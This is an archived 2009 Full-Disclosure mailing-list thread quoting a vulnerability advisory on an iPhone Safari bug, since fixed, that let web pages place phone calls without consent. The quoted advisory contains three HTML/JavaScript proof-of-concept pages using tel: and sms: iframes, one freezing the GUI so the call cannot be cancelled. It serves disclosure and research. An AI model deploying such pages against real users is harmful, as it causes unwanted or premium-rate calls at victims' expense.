full-disclosure-uk June 2009 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] iPhone Safari phone-au

Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)

From: Collin Mulliner <collin_at_nospam>
Date: Thu Jun 18 2009 - 17:29:05 GMT
To: Mike Ely <me@taupehat.com>


Mike,

just getting to the phone dialer is not a bug! That is what the tel: protocol is for. All most all mobile phones implement this, every time you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote: > Confirmed on the T-Mobile G1 email app running OS version 1.5. Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;) > > FWIW, it didn't actually dial, just loaded the dialer with that number ready. > > Looks like this is a Webkit bug, not Safari. > > Collin Mulliner <collin@betaversion.net> wrote: >
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device: iPhone 3G (iPhone 1st Gen)
>> Firmware: 2.1 (possible earlier versions)
>> Device Type: smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>> iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>> application logic bug
>>
>> Executive Summary:
>> A malicious website can initiate a phone call without the need of user
>> interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>> Medium to high risk due to the possibility of financial gain through
>> this attack by calling of premium rate numbers (e.g. 1-900 in the
>> U.S.). Denial-of-service against arbitrary phone numbers through
>> mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>> Oct. 20. 2008: Reported vulnerability to vendor.
>> Oct. 20. 2008: Vendor acknowledges receiving our email.
>> Not commenting on the vulnerability itself.
>> Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>> Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>> Oct. 30. 2008: Sent additional information.
>> Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>> version.
>> Nov. 20. 2008: Public disclosure.
>> Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>> iPhone OS 2.2
>> iPhone OS 2.2.1
>> iPhone OS 3.0
>>
>> -----------------------------
>>
>> Technical Details:
>>
>> The Safari version running on the iPhone supports handling the TEL [1]
>> protocol through launching the telephony/dialer application. This is
>> done by passing the provided phone number to the telephony
>> application. Under normal conditions, loading a tel: URI results in a
>> message box asking the user's permission to call the given number. The
>> user is presented with the simple choice to either press call or
>> cancel.
>>
>> A TEL URI can be opened automatically if the TEL URI is used as the
>> source of an HTML iframe or frame, as the URL of a meta refresh, as
>> the location of a HTTP 30X redirect, and as the location of the
>> current or a new window using javascript.
>>
>> We discovered a security vulnerability that dismisses the "ask for
>> permission to call" dialog in a way that chooses the "call" option
>> rather than the "cancel" option.
>>
>> This condition occurs if a TEL URI is activated at the same time
>> Safari is closed by launching an external application, for example
>> launching the SMS application (in order to handle a SMS URI [2]). The
>> SMS application can be launched through placing a SMS URI as the
>> source of an iframe. This is shown in the first proof-of-concept
>> exploit below.
>>
>> Further investigation showed that this behavior can be reproduced by
>> launching other applications such as: Maps, YouTube, and iTunes.
>> Launching these applications can be achieved through loading special
>> URLs using the meta refresh tag. This is shown in the second
>> proof-of-concept exploit below.
>>
>> We also discovered that the bug can also be triggered through popup
>> windows (e.g. javascript alert). In this situation the initiating app
>> does not need to be termianted in order to active the call.
>>
>> Finally, we discovered a second bug that can be used to perform
>> malicious phone calls that cannot be prevented or canceled by the
>> victim. This bug allows the attacker to freez the GUI (graphical user
>> interface) for a number of seconds. While the GUI is frozen the call
>> progresses in the background and cannot be stopped by the victim user.
>> Freezing the GUI is achieved by passing a "very long" phone number to
>> the SMS application. The SMS application, immediately after being
>> started, freezes the iPhone GUI. Also switching off the iPhone cannot
>> be performed fast enough in order to prevent the malicious call.
>>
>>
>> [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>> [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>> The dialing dialog is clearly shown to the user also the user, in most
>> cases, can't press cancel quick enough in order to stop the initiation
>> of the call. Once the external application is launched, the telephony
>> application is running in the background performing the call. Only
>> the call forwarding dialog (containing the "dismiss" button) indicates
>> a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>> <html>
>> <head>
>> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>> </title>
>> </head>
>> <body>
>> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>> <!-- second iframe is to attack quick users who manage to close the
>> first call-dialog //-->
>> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>> </body>
>> </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>> <html>
>> <head>
>> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>> </title>
>> <meta http-equiv="refresh" content="0;
>> URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>> </head>
>> <body>
>> <script lang=javascript>
>> function a() {
>> document.write("<iframe src=\"tel:+14089748388\" WIDTH=50
>> HEIGHT=10></iframe>");
>> }
>> setTimeout("a()", 100);
>> </script>
>> </body>
>> </html>
>>
>> Proof-of-Concept attack where the victim user cannot stop the malicious
>> phone call:
>>
>> <html>
>> <head>
>> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>> </title>
>> </head>
>> <body>
>> <script lang=javascript>
>> l = "<iframe src=\"sms:";
>> for (i = 0; i < 10000; i++) {
>> l = l + "3340948034298232";
>> }
>> l = l + "\" width=10 height=10></iframe><iframe
>> src=\"tel:+14089748388\" height=10 width=10></iframe>";
>> document.write(l);
>> </script>
>> </body>
>> </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>> Demo video available at:
>> http://www.mulliner.org/iphone/
>>
>> Advisories:
>> http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> --
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
>> does!
-- Collin R. Mulliner <collin@betaversion.net> info/pgp: finger collin@betaversion.net C gives you enough rope to hang yourself. C++ also gives you the tree object to tie it to. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/